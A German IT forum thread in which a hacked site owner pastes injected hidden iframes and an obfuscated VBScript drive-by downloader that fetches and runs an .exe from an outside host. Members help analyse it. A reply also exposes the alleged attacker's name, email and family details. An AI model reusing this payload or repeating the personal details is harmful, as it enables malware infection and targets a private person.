Top-Themen

AppleEntwicklungHardwareInternetLinuxMicrosoftMultimediaNetzwerkeOff TopicSicherheitSonstige SystemeVirtualisierungWeiterbildungZusammenarbeit

Aktuelle Themen

Administrator.de FeedbackApache ServerAppleAssemblerAudioAusbildungAuslandBackupBasicBatch & ShellBenchmarksBibliotheken & ToolkitsBlogsCloud-DiensteClusterCMSCPU, RAM, MainboardsCSSC und C++DatenbankenDatenschutzDebianDigitiales FernsehenDNSDrucker und ScannerDSL, VDSLE-BooksE-BusinessE-MailEntwicklungErkennung und -AbwehrExchange ServerFestplatten, SSD, RaidFirewallFlatratesGoogle AndroidGrafikGrafikkarten & MonitoreGroupwareHardwareHosting & HousingHTMLHumor (lol)Hyper-VIconsIDE & EditorenInformationsdiensteInstallationInstant MessagingInternetInternet DomäneniOSISDN & AnaloganschlüsseiTunesJavaJavaScriptKiXtartKVMLAN, WAN, WirelessLinuxLinux DesktopLinux NetzwerkLinux ToolsLinux UserverwaltungLizenzierungMac OS XMicrosoftMicrosoft OfficeMikroTik RouterOSMonitoringMultimediaMultimedia & ZubehörNetzwerkeNetzwerkgrundlagenNetzwerkmanagementNetzwerkprotokolleNotebook & ZubehörNovell NetwareOff TopicOpenOffice, LibreOfficeOutlook & MailPapierkorbPascal und DelphiPeripheriegerätePerlPHPPythonRechtliche FragenRedHat, CentOS, FedoraRouter & RoutingSambaSAN, NAS, DASSchriftartenSchulung & TrainingSEOServerServer-HardwareSicherheitSicherheits-ToolsSicherheitsgrundlagenSolarisSonstige SystemeSoziale NetzwerkeSpeicherkartenStudentenjobs & PraktikumSuche ProjektpartnerSuseSwitche und HubsTipps & TricksTK-Netze & GeräteUbuntuUMTS, EDGE & GPRSUtilitiesVB for ApplicationsVerschlüsselung & ZertifikateVideo & StreamingViren und TrojanerVirtualisierungVisual StudioVmwareVoice over IPWebbrowserWebentwicklungWeiterbildungWindows 7Windows 8Windows 10Windows InstallationWindows MobileWindows NetzwerkWindows ServerWindows SystemdateienWindows ToolsWindows UpdateWindows UserverwaltungWindows VistaWindows XPXenserverXMLZusammenarbeit
GELÖST

Homepage gehackt wurden?

Frage Sicherheit Erkennung und -Abwehr

Mitglied: Casanitto

Casanitto (Level 1) - Jetzt verbinden

08.09.2007, aktualisiert 09.09.2007, 4182 Aufrufe, 2 Kommentare

Hallo,

Seit heute kann ich mich nicht mehr in meine Homepage einloggen, benutze Webspell als CMS.
Er sagt mir zwar das ich korrekt eingeloggt bin, abba dann bei der nächsten Seite sagt er das ich eingeloggt sein muss um die Webseite zusehen!
Habe dann mal geschaut im Quelltext und da steht dann das hier:

01.
 <IFRAME src="http://usuarios.arnet.com.ar/alvarezluque/morgan.html" width="0" height="0" frameborder="0"></iframe> 
02.
<IFRAME src="http://usuarios.arnet.com.ar/alvarezluque/morgan.html" width="0" height="0" frameborder="0"></iframe> 
03.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
Das ist aber nicht von mir!
Wenn man diese Webseite aufruft kommt folgendes :
01.
<script language="JavaScript"> 
02.
<!-- 
03.
 
04.
function SymError() 
05.
06.
  return true; 
07.
08.
 
09.
window.onerror = SymError; 
10.
 
11.
var SymRealWinOpen = window.open; 
12.
 
13.
function SymWinOpen(url, name, attributes) 
14.
15.
  return (new Object()); 
16.
17.
 
18.
window.open = SymWinOpen; 
19.
 
20.
//--> 
21.
</script> 
22.
 
23.
<script language="JavaScript"> 
24.
<!-- 
25.
 
26.
function SymError() 
27.
28.
  return true; 
29.
30.
 
31.
window.onerror = SymError; 
32.
 
33.
var SymRealWinOpen = window.open; 
34.
 
35.
function SymWinOpen(url, name, attributes) 
36.
37.
  return (new Object()); 
38.
39.
 
40.
window.open = SymWinOpen; 
41.
 
42.
//--> 
43.
</script> 
44.
 
45.
<SCRIPT LANGUAGE="VBS"><!-- 
46.
d="=tdsjqu mbohvbhf>WCTdsjqu?po fssps sftvnf ofyuem > iuuq;00vtvbsjpt/bsofu/dpn/bs0bmwbsf{mvrvf0gmbti8/fyfTfu eg > epdvnfou/dsfbufFmf1#(pckfdu*eg/tfuBuusjcvuf dmbttje-.#tje;CE:7D667.76B4.22E1.:94B.11D15GD3:F47=$y<$g/D6$P-$(Njdsptpgu/YNMIUUQ-C$tfu TT#g$^$(Bepec/TusfbnO#T/uzqf > 2tus7>HFUy/Pqfo 6#- em- Gbmtf;#Tfoe' Hfu ufnq ejsfdupsz boe ;$ pvs eftujobujpo obnfg*#2>mtbtt)'w$Gw$,(joh/GjmfTztufnj%W%unq > G/HfuTqfdjbmGpmefs(3* m$nq g7#I$ G/CvjmeQbui(unq-;#$&pqfo+#xsjuf y/sftqpotfCpez;#tbwfupgjmf Y#-3:#dmp4&\$R<%ifmm/Bqqmjd'&3%R/=#Fyfd,)v#A#-U$-1=0t|%?=0cpez?=0iunm?=9#     (#-#7#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#               =0tdsjqu" 
47.
s="" 
48.
For i=1 To Len(d) 
49.
b=Mid(d,i,1) 
50.
a=Asc(b) 
51.
If a=1 Then a=9 
52.
If a=2 Then a=10 
53.
If a=3 Then a=13 
54.
If a=4 Then a=34 
55.
If a<=31 And a>=14 Then 
56.
s=s+Mid(s,Len(s)-(Asc(Mid(d,i+1,1))-36+90*(Asc(Mid(d,i+2,1))-35)),a-14+4) 
57.
i=i+2 
58.
Else 
59.
if a>=41 and a<=127 then a=a-1 
60.
if a <127 then s=s+Chr(a) else s=s+b 
61.
End If 
62.
Next 
63.
document.write s 
64.
 
65.
--></SCRIPT> 
66.
<script language="JavaScript"> 
67.
<!-- 
68.
var SymRealOnLoad; 
69.
var SymRealOnUnload; 
70.
 
71.
function SymOnUnload() 
72.
73.
  window.open = SymWinOpen; 
74.
  if(SymRealOnUnload != null) 
75.
     SymRealOnUnload(); 
76.
77.
 
78.
function SymOnLoad() 
79.
80.
  if(SymRealOnLoad != null) 
81.
     SymRealOnLoad(); 
82.
  window.open = SymRealWinOpen; 
83.
  SymRealOnUnload = window.onunload; 
84.
  window.onunload = SymOnUnload; 
85.
86.
 
87.
SymRealOnLoad = window.onload; 
88.
window.onload = SymOnLoad; 
89.
 
90.
//--> 
91.
</script> 
92.
 
93.
 
94.
<script language="JavaScript"> 
95.
<!-- 
96.
var SymRealOnLoad; 
97.
var SymRealOnUnload; 
98.
 
99.
function SymOnUnload() 
100.
101.
  window.open = SymWinOpen; 
102.
  if(SymRealOnUnload != null) 
103.
     SymRealOnUnload(); 
104.
105.
 
106.
function SymOnLoad() 
107.
108.
  if(SymRealOnLoad != null) 
109.
     SymRealOnLoad(); 
110.
  window.open = SymRealWinOpen; 
111.
  SymRealOnUnload = window.onunload; 
112.
  window.onunload = SymOnUnload; 
113.
114.
 
115.
SymRealOnLoad = window.onload; 
116.
window.onload = SymOnLoad; 
117.
 
118.
//--> 
119.
</script>
Kann mir von euch vielleicht jemand sagen was das sein soll?

Gruss Casanitto
Mitglied: thekingofqueens
08.09.2007 um 22:27 Uhr
Provider informieren, Backup des Contents machen, alles löschen und von vorne anfangen.
Bitte warten ..
Mitglied: gnarff
09.09.2007 um 02:09 Uhr
Zu den Codesnippet:
1: Ein Scriptblocker
2. Geblockt wurde folgendes Script:
<SCRIPT LANGUAGE="VBS"><!--
d="=tdsjqu mbohvbhf>WCTdsjqu?po fssps sftvnf ofyuem > iuuq;00vtvbsjpt/bsofu/dpn/bs0bmwbsf{mvrvf0gmbti8/fyfTfu eg > epdvnfou/dsfbufFmf1#(pckfdu*eg/tfuBuusjcvuf dmbttje-.#tje;CE:7D667.76B4.22E1.:94B.11D15GD3:F47=$y<$g/D6$P-$(Njdsptpgu/YNMIUUQ-C$tfu TT#g$^$(Bepec/TusfbnO#T/uzqf > 2tus7>HFUy/Pqfo 6#- em- Gbmtf;#Tfoe' Hfu ufnq ejsfdupsz boe ;$ pvs eftujobujpo obnfg*#2>mtbtt)'w$Gw$,(joh/GjmfTztufnj%W%unq > G/HfuTqfdjbmGpmefs(3* m$nq g7#I$ G/CvjmeQbui(unq-;#$&pqfo+#xsjuf y/sftqpotfCpez;#tbwfupgjmf Y#-3:#dmp4&\$R<%ifmm/Bqqmjd'&3%R/=#Fyfd,)v#A#-U$-1=0t|%?=0cpez?=0iunm?=9# (#-#7#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8# =0tdsjqu"
s=""
For i=1 To Len(d)
b=Mid(d,i,1)
a=Asc(b)
If a=1 Then a=9
If a=2 Then a=10
If a=3 Then a=13
If a=4 Then a=34
If a<=31 And a>=14 Then
s=s+Mid(s,Len(s)-(Asc(Mid(d,i+1,1))-36+90*(Asc(Mid(d,i+2,1))-35)),a-14+4)
i=i+2
Else
if a>=41 and a<=127 then a=a-1
if a <127 then s=s+Chr(a) else s=s+b
End If
Next
document.write s

Wenn Du wissen willst was Alvarez auf Deiner HP wollte oder dich gar beschweren moechtest, so kannst Du das direkt bei Ihm tun alvarezluque@arnet.com.ar, sein Vater ist Sekretaer des Rotary Clubs in Corrientes, Argentinien, sein voller Name ist Augusto Alvarez Luque, Dipl. Informatiker,
saludos
gnarff
Bitte warten ..
Ähnliche Inhalte
PHP
Homepage nach PHP Update blank (4)

Frage von ric2k17 zum Thema PHP ...

Rechtliche Fragen
gelöst Microsoftkonto wurde gehackt - Liegt das Problem direkt bei Microsoft? (7)

Frage von Stefan007 zum Thema Rechtliche Fragen ...

Batch & Shell
gelöst Abfrage ob Daten eingegeben wurden (5)

Frage von Floki1 zum Thema Batch & Shell ...

Neue Wissensbeiträge
Drucker und Scanner

Samsung SL-M4025ND, firmware update und (kompatible) Tonerkassetten

(1)

Erfahrungsbericht von markus-1969 zum Thema Drucker und Scanner ...

Router & Routing

PfSense auf Supermicro Intel Xeon D-15x8 SoC Bare Bone

Tipp von Dobby zum Thema Router & Routing ...

Windows Server

Exchange 2010 auf Windows Server 2016 und AD

(2)

Tipp von Herbrich19 zum Thema Windows Server ...

KVM

How to: Libvirt Port forwarding

(2)

Anleitung von fundave3 zum Thema KVM ...

Heiß diskutierte Inhalte
Router & Routing
über Vmware auf eine FritzBox mit IPv6 per VPN (17)

Frage von Zockervogel zum Thema Router & Routing ...

Windows Server
gelöst Netzlaufwerk RemoteApp auf Win 2012 R2 Terminalserver funktioniert nicht (12)

Frage von grenzde zum Thema Windows Server ...

Basic
Programmierung von Windows Programmen (8)

Frage von Ghost108 zum Thema Basic ...